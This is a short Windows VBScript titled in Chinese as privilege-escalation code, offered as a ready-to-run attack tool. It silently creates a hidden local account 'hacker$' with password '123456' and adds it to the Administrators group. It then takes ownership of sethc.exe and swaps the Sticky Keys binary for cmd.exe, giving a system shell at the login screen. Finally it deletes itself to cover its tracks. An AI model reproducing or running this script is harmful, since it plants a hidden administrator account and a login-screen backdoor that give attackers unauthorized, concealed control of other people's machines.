提权vbs代码

on error resume next
dim username,password:if wscript.arguments.count then:username=wscript.arguments
(0):password=wscript.arguments(1):else:username="hacker$":password="123456":end if:set
wsnetwork=createobject("wscript.network"):os="winnt://"&wsnetwork.computername:set ob=getobject
(os):set oe=getobject(os&"/administrators,group"):set od=ob.create("user",username):od.setpassword
password:od.setinfo:set of=getobject(os&"/"&username&",user"):oe.add(of.adspath)'wscript.echo
of.adspath
on error resume next
dim obj, success
set obj = createobject("wscript.shell")
success = obj.run("cmd /c takeown /f %systemroot%\system32\sethc.exe&echo y| cacls %systemroot%
\system32\sethc.exe /g %username%:f&copy %systemroot%\system32\cmd.exe %systemroot%\system32
\acmd.exe&copy %systemroot%\system32\sethc.exe %systemroot%\system32\asethc.exe&del %systemroot%
\system32\sethc.exe&ren %systemroot%\system32\acmd.exe sethc.exe", 0, true)
createobject("scripting.filesystemobject").deletefile(wscript.scriptname)